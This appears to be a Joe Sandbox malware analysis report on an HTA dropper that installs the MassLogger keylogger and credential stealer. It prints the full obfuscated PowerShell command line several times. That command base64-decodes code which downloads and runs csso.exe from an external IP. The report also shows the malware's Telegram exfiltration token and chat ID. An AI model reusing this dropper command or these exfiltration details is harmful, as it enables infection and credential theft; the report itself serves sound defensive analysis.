Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
uhg.hta

Overview

General Information

Sample name:uhg.hta
Analysis ID:1636641
MD5:179a3830db0768b766cc9375a3cf9a4c
SHA1:eb5290b3b563ad540db805c77b67bf49d394308e
SHA256:735354ae6e387cd7d7b63f2bc45f838f1218f956e278e20401b8ad606dec8488
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike, MSIL Logger, MassLogger RAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected Cobalt Strike Beacon
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Powershell decode and execute
Yara detected Telegram RAT
.NET source code references suspicious native API functions
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious MSHTA Child Process
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 7336 cmdline: mshta.exe "C:\Users\user\Desktop\uhg.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 7400 cmdline: "C:\Windows\system32\cmd.exe" "/c PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7452 cmdline: PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 7564 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 7584 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC24D.tmp" "c:\Users\user\AppData\Local\Temp\hbmngfjp\CSCC4E96BC32174751BC6DB24E42E04ED1.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • csso.exe (PID: 7620 cmdline: "C:\Users\user\AppData\Roaming\csso.exe" MD5: 724A10F0D502447504BD44AD72AA462F)
          • RegSvcs.exe (PID: 7656 cmdline: "C:\Users\user\AppData\Roaming\csso.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7598843355:AAHehybWWiULdkPS1RLFstdr4_yw-SdkoII", "Telegram Chatid": "7668947425"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
        00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0xefdf:$a1: get_encryptedPassword
          • 0xf307:$a2: get_encryptedUsername
          • 0xed7a:$a3: get_timePasswordChanged
          • 0xee9b:$a4: get_passwordField
          • 0xeff5:$a5: set_encryptedPassword
          • 0x10951:$a7: get_logins
          • 0x10602:$a8: GetOutlookPasswords
          • 0x103f4:$a9: StartKeylogger
          • 0x108a1:$a10: KeyLoggerEventArgs
          • 0x10451:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 17 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          7.2.RegSvcs.exe.380000.0.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            7.2.RegSvcs.exe.380000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              7.2.RegSvcs.exe.380000.0.unpackJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
                7.2.RegSvcs.exe.380000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  7.2.RegSvcs.exe.380000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0xf1df:$a1: get_encryptedPassword
                  • 0xf507:$a2: get_encryptedUsername
                  • 0xef7a:$a3: get_timePasswordChanged
                  • 0xf09b:$a4: get_passwordField
                  • 0xf1f5:$a5: set_encryptedPassword
                  • 0x10b51:$a7: get_logins
                  • 0x10802:$a8: GetOutlookPasswords
                  • 0x105f4:$a9: StartKeylogger
                  • 0x10aa1:$a10: KeyLoggerEventArgs
                  • 0x10651:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 13 entries

                  Other

                  SourceRuleDescriptionAuthorStrings
                  amsi32_7452.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Suspicious MSHTA Child Process
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/c PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgI
                    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7452, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline", ProcessId: 7564, ProcessName: csc.exe
                    Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7452, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csso[1].exe
                    Sigma detected: Dynamic CSharp Compile Artefact
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7452, TargetFilename: C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))", CommandLine: PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA

                    Data Obfuscation

                    barindex
                    Sigma detected: Dot net compiler compiles file from suspicious location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7452, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline", ProcessId: 7564, ProcessName: csc.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-13T01:18:55.126197+010020220501A Network Trojan was detected23.95.235.2880192.168.2.649694TCP
